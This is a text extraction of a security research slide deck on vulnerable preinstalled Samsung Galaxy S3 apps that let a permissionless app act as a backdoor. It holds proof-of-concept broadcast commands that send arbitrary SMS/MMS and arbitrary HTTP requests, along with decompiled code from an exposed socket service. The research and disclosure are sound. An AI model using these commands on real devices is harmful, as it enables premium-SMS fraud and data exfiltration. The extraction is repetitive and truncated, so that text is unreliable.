Android OEM's applications (in)security and backdoors ... - QuarksLAB
Android OEM's applications (in)security and backdoors ... - QuarksLAB
Android OEM's applications (in)security and backdoors ... - QuarksLAB
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
<strong>Android</strong> OEM’s <strong>applications</strong> (<strong>in</strong>)<strong>security</strong> <strong>and</strong><br />
<strong>backdoors</strong> without permission<br />
André Moulu<br />
amoulu@quarkslab.com
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Plan<br />
1 Context <strong>and</strong> objectives<br />
2 <strong>Android</strong> <strong>in</strong>troduction<br />
3 <strong>Android</strong> <strong>security</strong> model<br />
4 Methodology<br />
5 Toward a backdoor without permission<br />
6 Post-exploitation<br />
7 Scope of the vulnerabilities<br />
8 Conclusion
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Context <strong>and</strong> objectives<br />
Why <strong>Android</strong>?<br />
Most used mobile OS<br />
Security often questioned because of many malwares<br />
Unofficial markets (warez)<br />
Show off how an application without any permission can take<br />
control of a smartphone
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Context <strong>and</strong> objectives<br />
Targeted user<br />
Security aware user<br />
Doesn’t use alternative markets<br />
Checks permissions before <strong>in</strong>stall<strong>in</strong>g an application<br />
Targeted smartphone<br />
Samsung Galaxy S3 (I9300)<br />
50 millions copies sold (March 2013)<br />
Actually, the Samsung frontend on the I9300<br />
Some of these <strong>applications</strong> may also be present on other models<br />
Some vulnerabilities may impact other models (S2, S4, Note 1/2, ...)<br />
The vulnerable <strong>applications</strong> can’t be deleted without root access
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Plan<br />
1 Context <strong>and</strong> objectives<br />
2 <strong>Android</strong> <strong>in</strong>troduction<br />
3 <strong>Android</strong> <strong>security</strong> model<br />
4 Methodology<br />
5 Toward a backdoor without permission<br />
6 Post-exploitation<br />
7 Scope of the vulnerabilities<br />
8 Conclusion
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Plan<br />
1 Context <strong>and</strong> objectives<br />
2 <strong>Android</strong> <strong>in</strong>troduction<br />
<strong>Android</strong> system <strong>and</strong> the <strong>applications</strong><br />
Classical components of an <strong>Android</strong> application<br />
The communication between components<br />
The exposition of components<br />
3 <strong>Android</strong> <strong>security</strong> model<br />
4 Methodology<br />
5 Toward a backdoor without permission<br />
6 Post-exploitation
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
<strong>Android</strong> system <strong>and</strong> the <strong>applications</strong><br />
The <strong>Android</strong> system<br />
Generalities <strong>and</strong> common knowledge<br />
Mobile OS (smartphone/tablet) ”open source”<br />
Based on L<strong>in</strong>ux<br />
Developed <strong>in</strong> C <strong>and</strong> Java<br />
A special virtual mach<strong>in</strong>e: DalvikVM<br />
Dalvik Bytecode (DEX/ODEX)<br />
What is an <strong>Android</strong> application ?<br />
APK file (actually a ZIP file)<br />
APK’s most important files:<br />
<strong>Android</strong>Manifest.xml (configuration, permissions, components, ...)<br />
classes.dex (executable bytecode)<br />
Native libraries as .so files (JNI)<br />
Each application has an unique name (packagename) <strong>and</strong> is signed<br />
by his developper (certificate)
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Classical components of an <strong>Android</strong> application<br />
The applicative components
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Classical components of an <strong>Android</strong> application<br />
The applicative components
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Classical components of an <strong>Android</strong> application<br />
The applicative components
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Classical components of an <strong>Android</strong> application<br />
The applicative components
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Classical components of an <strong>Android</strong> application<br />
The applicative components
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Classical components of an <strong>Android</strong> application<br />
The applicative components
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
The communication between components<br />
The Intent: source of communication <strong>in</strong> <strong>Android</strong>
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
The communication between components<br />
The Intent: source of communication <strong>in</strong> <strong>Android</strong>
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
The communication between components<br />
The Intent: source of communication <strong>in</strong> <strong>Android</strong>
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
The communication between components<br />
The Intent: source of communication <strong>in</strong> <strong>Android</strong>
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
The communication between components<br />
The Intent: source of communication <strong>in</strong> <strong>Android</strong>
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
The exposition of components<br />
Can we talk to this component?<br />
exported or not, that’s the question<br />
By default, components are not exported<br />
Special case: ContentProvider<br />
The component status, exported or not, is def<strong>in</strong>ed by<br />
<strong>Android</strong>Manifest.xml<br />
The attribute exported=[true|false]<br />
Presence of an <strong>in</strong>tent-filter (the component is automatically<br />
exported)<br />
A component can be exported but protected by a permission
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
The exposition of components<br />
Example of <strong>Android</strong>Manifest.xml<br />
1 <br />
2 <br />
4 <br />
5 <br />
6 <br />
7 <br />
9 <br />
10 <br />
11 <br />
12 <br />
13 <br />
14 <br />
15 <br />
16 <br />
17 <br />
18 <br />
19 <br />
20 <br />
21 <br />
22
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
The exposition of components<br />
Example of <strong>Android</strong>Manifest.xml<br />
1 <br />
2 <br />
4 <br />
5 <br />
6 <br />
7 <br />
9 <br />
10 <br />
11 <br />
12 <br />
13 <br />
14 <br />
15 <br />
16 <br />
17 <br />
18 <br />
19 <br />
20 <br />
21 <br />
22
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
The exposition of components<br />
Example of <strong>Android</strong>Manifest.xml<br />
1 <br />
2 <br />
4 <br />
5 <br />
6 <br />
7 <br />
9 <br />
10 <br />
11 <br />
12 <br />
13 <br />
14 <br />
15 <br />
16 <br />
17 <br />
18 <br />
19 <br />
20 <br />
21 <br />
22
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
The exposition of components<br />
Example of <strong>Android</strong>Manifest.xml<br />
1 <br />
2 <br />
4 <br />
5 <br />
6 <br />
7 <br />
9 <br />
10 <br />
11 <br />
12 <br />
13 <br />
14 <br />
15 <br />
16 <br />
17 <br />
18 <br />
19 <br />
20 <br />
21 <br />
22
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
The exposition of components<br />
Example of <strong>Android</strong>Manifest.xml<br />
1 <br />
2 <br />
4 <br />
5 <br />
6 <br />
7 <br />
9 <br />
10 <br />
11 <br />
12 <br />
13 <br />
14 <br />
15 <br />
16 <br />
17 <br />
18 <br />
19 <br />
20 <br />
21 <br />
22
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
The exposition of components<br />
Example of <strong>Android</strong>Manifest.xml<br />
1 <br />
2 <br />
4 <br />
5 <br />
6 <br />
7 <br />
9 <br />
10 <br />
11 <br />
12 <br />
13 <br />
14 <br />
15 <br />
16 <br />
17 <br />
18 <br />
19 <br />
20 <br />
21 <br />
22
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Plan<br />
1 Context <strong>and</strong> objectives<br />
2 <strong>Android</strong> <strong>in</strong>troduction<br />
3 <strong>Android</strong> <strong>security</strong> model<br />
Applications isolation<br />
The permission system<br />
4 Methodology<br />
5 Toward a backdoor without permission<br />
6 Post-exploitation<br />
7 Scope of the vulnerabilities
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Applications isolation<br />
One user per application<br />
Security by isolation<br />
Default behaviour:<br />
Each application has a dedicated user (<strong>and</strong> therefore an UID) on the<br />
system<br />
Special case:<br />
An application can ask to share an UID with another application<br />
sharedUserId mechanism (<strong>Android</strong>Manifest.xml)<br />
In order to share an UID, 2 <strong>applications</strong> must be signed with the<br />
same certificate<br />
Consequences<br />
Isolation between application <strong>in</strong> memory (process)<br />
Isolation on the filesystem<br />
Don’t protect aga<strong>in</strong>st world readable/writeable files
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
The permission system<br />
Application restrictions<br />
Least privilege <strong>security</strong><br />
Permission to protect aga<strong>in</strong>st dangerous actions:<br />
SD card write access, INTERNET access, send<strong>in</strong>g SMS, ...<br />
By default, an application doesn’t have any permission<br />
You need to ask for them explicitly <strong>in</strong> <strong>Android</strong>Manifest.xml<br />
Asked permissions are shown to the user at <strong>in</strong>stallation<br />
Boolean choice<br />
A permission can protect:<br />
Functions: AccountManager.getAccounts() (GET_ACCOUNTS)<br />
Intents: <strong>and</strong>roid.<strong>in</strong>tent.action.CALL (CALL_PHONE)<br />
Components: content://contacts (READ_CONTACTS, ...)<br />
A permission is given to an UID <strong>and</strong> not to a packagename<br />
Permission model is applied on native code too<br />
All permissions of each application with the same sharedUserId are<br />
comb<strong>in</strong>ed
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
The permission system<br />
Application restrictions<br />
Consequences of the permission model<br />
Components can be protected<br />
The user ”knows” what the application can do when it is <strong>in</strong>stalled,<br />
thus the associated risks<br />
Limit the impact <strong>in</strong> case of vulnerable application
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Plan<br />
1 Context <strong>and</strong> objectives<br />
2 <strong>Android</strong> <strong>in</strong>troduction<br />
3 <strong>Android</strong> <strong>security</strong> model<br />
4 Methodology<br />
A huge surface attack<br />
Vulnerability research<br />
5 Toward a backdoor without permission<br />
6 Post-exploitation<br />
7 Scope of the vulnerabilities
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
A huge surface attack<br />
The attack surface<br />
Important folders<br />
We want to do a backdoor target<strong>in</strong>g an <strong>Android</strong> smartphone<br />
Userl<strong>and</strong> vulnerabilities (easy to f<strong>in</strong>d, easy to exploit)<br />
Folders customized by constructors on an <strong>Android</strong> smartphone:<br />
/system/app<br />
/system/framework<br />
/system/b<strong>in</strong><br />
/system/lib<br />
The content of these folders may change between operators
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
A huge surface attack<br />
A huge surface attack<br />
A large number of <strong>applications</strong><br />
Only two folders exam<strong>in</strong>ed, but a consequent attack surface<br />
216 APK <strong>in</strong> /system/app<br />
To compare: 91 APK for the Nexus 4
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Vulnerability research<br />
Automation<br />
Constra<strong>in</strong>ts<br />
Many application, need automation to f<strong>in</strong>d <strong>in</strong>terest<strong>in</strong>g <strong>applications</strong><br />
Then audit by h<strong>and</strong> (reverse eng<strong>in</strong>eer<strong>in</strong>g)<br />
Exploitation of vulnerabilities with a little amount or no permission<br />
at all<br />
Creation of some scripts: ASA<br />
Based on Androguard (great framework)<br />
ASAManifest: Analyzes the manifest of an application <strong>and</strong> tells<br />
which components are exported <strong>and</strong> under what conditions<br />
ASADatabase: Analyzes a large amount of <strong>applications</strong> like<br />
ASAManifest does <strong>and</strong> checks for sensitive API usage. The results<br />
are stored <strong>in</strong> MongoDB database.<br />
ASADiff (ongo<strong>in</strong>g): Diff between two versions of a system, by<br />
example to detect vulnerability patch<strong>in</strong>g.
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Vulnerability research<br />
ASAManifest
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Vulnerability research<br />
ASADatabase: examples of queries on MongoDB<br />
Applications with INSTALL PACKAGES permission<br />
> db.gs3.f<strong>in</strong>d({permission:/INSTALL_PACKAGES/},{filename:1,_id:0})<br />
{ "filename" : "DttSupport.apk" }<br />
{ "filename" : "Kies.apk" }<br />
{ "filename" : "MtpApplication.apk" }<br />
{ "filename" : "PackageInstaller.apk" }<br />
[...]<br />
Number of sharedUserId system <strong>applications</strong><br />
> db.gs3.f<strong>in</strong>d({"manifest.sharedUserId":"<strong>and</strong>roid.uid.system"},{}).count()<br />
41<br />
Which one really use INSTALL PACKAGES ?<br />
> db.gs3.f<strong>in</strong>d({permission:/INSTALL_PACKAGES/},{filename:1,_id:0}).count()<br />
11<br />
> db.gs3.f<strong>in</strong>d({permission:/INSTALL_PACKAGES/,use_<strong>in</strong>stallPackage:true},<br />
{filename:1,_id:0}).count()<br />
10<br />
> db.gs3.f<strong>in</strong>d({permission:/INSTALL_PACKAGES/,use_<strong>in</strong>stallPackage:false},<br />
{filename:1,_id:0})<br />
{ "filename" : "MtpApplication.apk" }
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Plan<br />
1 Context <strong>and</strong> objectives<br />
2 <strong>Android</strong> <strong>in</strong>troduction<br />
3 <strong>Android</strong> <strong>security</strong> model<br />
4 Methodology<br />
5 Toward a backdoor without permission<br />
Backdoor’s features<br />
SD Card: <strong>Android</strong> <strong>and</strong> the retrocompatibility...<br />
SMS/MMS send<strong>in</strong>g <strong>and</strong> files exfiltration<br />
Arbitrary HTTP requests execution<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Sync for fun <strong>and</strong> profit<br />
I dont need root when i have system
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Backdoor’s features<br />
Objectives
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
SD Card: <strong>Android</strong> <strong>and</strong> the retrocompatibility...<br />
SD Card: a protected storage?<br />
Once upon a time... <strong>Android</strong><br />
First versions: total access to the SD Card<br />
read & write access
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
SD Card: <strong>Android</strong> <strong>and</strong> the retrocompatibility...<br />
SD Card: a protected storage?<br />
Once upon a time... <strong>Android</strong><br />
First versions: total access to the SD Card<br />
read & write access<br />
Current state<br />
Write access: WRITE EXTERNAL STORAGE<br />
Read access: currently ”tolerated” without permission<br />
Dangerous for user privacy (<strong>in</strong>ternet + sdcard)<br />
Introduction of the READ EXTERNAL STORAGE permission<br />
”Protect the SD Card” <strong>in</strong> system parameters (JB)
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
SD Card: <strong>Android</strong> <strong>and</strong> the retrocompatibility...<br />
SD Card: a protected storage?<br />
Once upon a time... <strong>Android</strong><br />
First versions: total access to the SD Card<br />
read & write access<br />
Current state<br />
Write access: WRITE EXTERNAL STORAGE<br />
Read access: currently ”tolerated” without permission<br />
Dangerous for user privacy (<strong>in</strong>ternet + sdcard)<br />
Introduction of the READ EXTERNAL STORAGE permission<br />
”Protect the SD Card” <strong>in</strong> system parameters (JB)<br />
And what about the retrocompatibility?<br />
From the <strong>and</strong>roid documentation, if m<strong>in</strong>SdkVersion <strong>and</strong><br />
targetSdkVersion
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
SD Card: <strong>Android</strong> <strong>and</strong> the retrocompatibility...<br />
Objectives
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
SMS/MMS send<strong>in</strong>g <strong>and</strong> files exfiltration<br />
Vuln1 - SecMms.apk<br />
The malwares <strong>and</strong> premium SMS<br />
Current <strong>Android</strong> malwares ask for the SEND SMS permission<br />
Easily detectable <strong>and</strong> suspect for an user<br />
What about a malware which can send premium SMS without ask<strong>in</strong>g<br />
for permission?
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
SMS/MMS send<strong>in</strong>g <strong>and</strong> files exfiltration<br />
Vuln1 - SecMms.apk<br />
The malwares <strong>and</strong> premium SMS<br />
Current <strong>Android</strong> malwares ask for the SEND SMS permission<br />
Easily detectable <strong>and</strong> suspect for an user<br />
What about a malware which can send premium SMS without ask<strong>in</strong>g<br />
for permission?<br />
There is an app for that<br />
SecMms.apk<br />
exported BroadcastReceiver -> ui.MmsBGSender<br />
An well formatted Intent allows to send arbitrary SMS/MMS
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
SMS/MMS send<strong>in</strong>g <strong>and</strong> files exfiltration<br />
Vuln1 - SecMms.apk<br />
The malwares <strong>and</strong> premium SMS<br />
Current <strong>Android</strong> malwares ask for the SEND SMS permission<br />
Easily detectable <strong>and</strong> suspect for an user<br />
What about a malware which can send premium SMS without ask<strong>in</strong>g<br />
for permission?<br />
There is an app for that<br />
SecMms.apk<br />
exported BroadcastReceiver -> ui.MmsBGSender<br />
An well formatted Intent allows to send arbitrary SMS/MMS<br />
PoC (attachments can also be added)<br />
shell@<strong>and</strong>roid:/ $ am broadcast -a com.<strong>and</strong>roid.mms.QUICKSND --es mms_to "*PHONENUMBER*"<br />
--es mms_subject "*SUBJECT*" --es mms_text "*MESSAGE*"
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
SMS/MMS send<strong>in</strong>g <strong>and</strong> files exfiltration<br />
Objectives
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Arbitrary HTTP requests execution<br />
Vuln2 - PCWClientS.apk<br />
PCWReceiver<br />
When an Intent is received with<br />
com.sec.pcw.device.HTTP_REQUEST_RETRY as action<br />
The body, uri <strong>and</strong> pushType attributed are extracted <strong>and</strong> an<br />
HTTP POST request is executed based on it<br />
PoC<br />
shell@<strong>and</strong>roid:/ $ am broadcast -a com.sec.pcw.device.HTTP_REQUEST_RETRY --es uri<br />
*URL* --es body *POST_DATA* --es pushType *PUSHTYPE*
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Arbitrary HTTP requests execution<br />
Objectives
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
Typical problems with constructor frontend<br />
This vulnerability was patched by Samsung before we reported it<br />
Patched on the S3 but not on the S2, Tab 1, Note 1<br />
Special case: INTERNET permission is needed<br />
creation of a socket<br />
smlNpsReceiver<br />
The application exports a BroadcastReceiver smlNpsReceiver<br />
Answers to Intent related to Kies<br />
com.<strong>in</strong>tent.action.KIES WSSERVICE START<br />
com.<strong>in</strong>tent.action.KIES WSSERVICE START WIFI
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
smlNpsReceiver<br />
1 public void onReceive(Context paramContext, Intent paramIntent)<br />
2 {<br />
3 [...]<br />
4 if(paramIntent.getAction().<br />
5 equals("com.<strong>in</strong>tent.action.KIES_WSSERVICE_START"))<br />
6 {<br />
7 smlDebug.SML_DEBUG(2, "KIES_WSSERVICE_START");<br />
8 wifi_connected = false;<br />
9 usb_connected = true;<br />
10 paramContext.stopService(<br />
11 new Intent(paramContext, smlNpsService.class)<br />
12 );<br />
13 paramContext.startService(<br />
14 new Intent(paramContext, smlNpsService.class)<br />
15 );<br />
16 }<br />
17 [...]<br />
18 }
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
smlNpsReceiver<br />
1 public void onReceive(Context paramContext, Intent paramIntent)<br />
2 {<br />
3 [...]<br />
4 if(paramIntent.getAction().<br />
5 equals("com.<strong>in</strong>tent.action.KIES_WSSERVICE_START"))<br />
6 {<br />
7 smlDebug.SML_DEBUG(2, "KIES_WSSERVICE_START");<br />
8 wifi_connected = false;<br />
9 usb_connected = true;<br />
10 paramContext.stopService(<br />
11 new Intent(paramContext, smlNpsService.class)<br />
12 );<br />
13 paramContext.startService(<br />
14 new Intent(paramContext, smlNpsService.class)<br />
15 );<br />
16 }<br />
17 [...]<br />
18 }
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
smlNpsReceiver<br />
1 public void onReceive(Context paramContext, Intent paramIntent)<br />
2 {<br />
3 [...]<br />
4 if(paramIntent.getAction().<br />
5 equals("com.<strong>in</strong>tent.action.KIES_WSSERVICE_START"))<br />
6 {<br />
7 smlDebug.SML_DEBUG(2, "KIES_WSSERVICE_START");<br />
8 wifi_connected = false;<br />
9 usb_connected = true;<br />
10 paramContext.stopService(<br />
11 new Intent(paramContext, smlNpsService.class)<br />
12 );<br />
13 paramContext.startService(<br />
14 new Intent(paramContext, smlNpsService.class)<br />
15 );<br />
16 }<br />
17 [...]<br />
18 }
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
smlNpsReceiver<br />
1 public void onReceive(Context paramContext, Intent paramIntent)<br />
2 {<br />
3 [...]<br />
4 if(paramIntent.getAction().<br />
5 equals("com.<strong>in</strong>tent.action.KIES_WSSERVICE_START"))<br />
6 {<br />
7 smlDebug.SML_DEBUG(2, "KIES_WSSERVICE_START");<br />
8 wifi_connected = false;<br />
9 usb_connected = true;<br />
10 paramContext.stopService(<br />
11 new Intent(paramContext, smlNpsService.class)<br />
12 );<br />
13 paramContext.startService(<br />
14 new Intent(paramContext, smlNpsService.class)<br />
15 );<br />
16 }<br />
17 [...]<br />
18 }
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
smlNpsService<br />
When it starts, it runs NpsServiceTask <strong>in</strong> a thread<br />
Listens on 0.0.0.0:1108 (TCP)<br />
Each connection is h<strong>and</strong>led by smlNpsH<strong>and</strong>ler <strong>in</strong> a separated thread<br />
The method work() is called to h<strong>and</strong>le the received data
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
smlNpsH<strong>and</strong>ler.work()<br />
1 protected void work()<br />
2 {<br />
3 if(this.socket != 0)<br />
4 {<br />
5 socketIS = this.socket.getInputStream();<br />
6 socketOS = this.socket.getOutputStream();<br />
7 cmdL<strong>in</strong>e = this.readL<strong>in</strong>e(socketIS);<br />
8 if((cmdL<strong>in</strong>e != 0) && (cmdL<strong>in</strong>e.length() != 0))<br />
9 {<br />
10 cmdInformation = new Str<strong>in</strong>g[3];<br />
11 v5 = cmdL<strong>in</strong>e.<strong>in</strong>dexOf("BEGIN");<br />
12 cmdInformation[0] = cmdL<strong>in</strong>e.substr<strong>in</strong>g(0, 3);<br />
13 if(v5
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
smlNpsH<strong>and</strong>ler.work()<br />
1 protected void work()<br />
2 {<br />
3 if(this.socket != 0)<br />
4 {<br />
5 socketIS = this.socket.getInputStream();<br />
6 socketOS = this.socket.getOutputStream();<br />
7 cmdL<strong>in</strong>e = this.readL<strong>in</strong>e(socketIS);<br />
8 if((cmdL<strong>in</strong>e != 0) && (cmdL<strong>in</strong>e.length() != 0))<br />
9 {<br />
10 cmdInformation = new Str<strong>in</strong>g[3];<br />
11 v5 = cmdL<strong>in</strong>e.<strong>in</strong>dexOf("BEGIN");<br />
12 cmdInformation[0] = cmdL<strong>in</strong>e.substr<strong>in</strong>g(0, 3);<br />
13 if(v5
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
smlNpsH<strong>and</strong>ler.work()<br />
1 protected void work()<br />
2 {<br />
3 if(this.socket != 0)<br />
4 {<br />
5 socketIS = this.socket.getInputStream();<br />
6 socketOS = this.socket.getOutputStream();<br />
7 cmdL<strong>in</strong>e = this.readL<strong>in</strong>e(socketIS);<br />
8 if((cmdL<strong>in</strong>e != 0) && (cmdL<strong>in</strong>e.length() != 0))<br />
9 {<br />
10 cmdInformation = new Str<strong>in</strong>g[3];<br />
11 v5 = cmdL<strong>in</strong>e.<strong>in</strong>dexOf("BEGIN");<br />
12 cmdInformation[0] = cmdL<strong>in</strong>e.substr<strong>in</strong>g(0, 3);<br />
13 if(v5
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
smlNpsH<strong>and</strong>ler.work()<br />
1 protected void work()<br />
2 {<br />
3 if(this.socket != 0)<br />
4 {<br />
5 socketIS = this.socket.getInputStream();<br />
6 socketOS = this.socket.getOutputStream();<br />
7 cmdL<strong>in</strong>e = this.readL<strong>in</strong>e(socketIS);<br />
8 if((cmdL<strong>in</strong>e != 0) && (cmdL<strong>in</strong>e.length() != 0))<br />
9 {<br />
10 cmdInformation = new Str<strong>in</strong>g[3];<br />
11 v5 = cmdL<strong>in</strong>e.<strong>in</strong>dexOf("BEGIN");<br />
12 cmdInformation[0] = cmdL<strong>in</strong>e.substr<strong>in</strong>g(0, 3);<br />
13 if(v5
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
smlNpsH<strong>and</strong>ler.work()<br />
1 protected void work()<br />
2 {<br />
3 if(this.socket != 0)<br />
4 {<br />
5 socketIS = this.socket.getInputStream();<br />
6 socketOS = this.socket.getOutputStream();<br />
7 cmdL<strong>in</strong>e = this.readL<strong>in</strong>e(socketIS);<br />
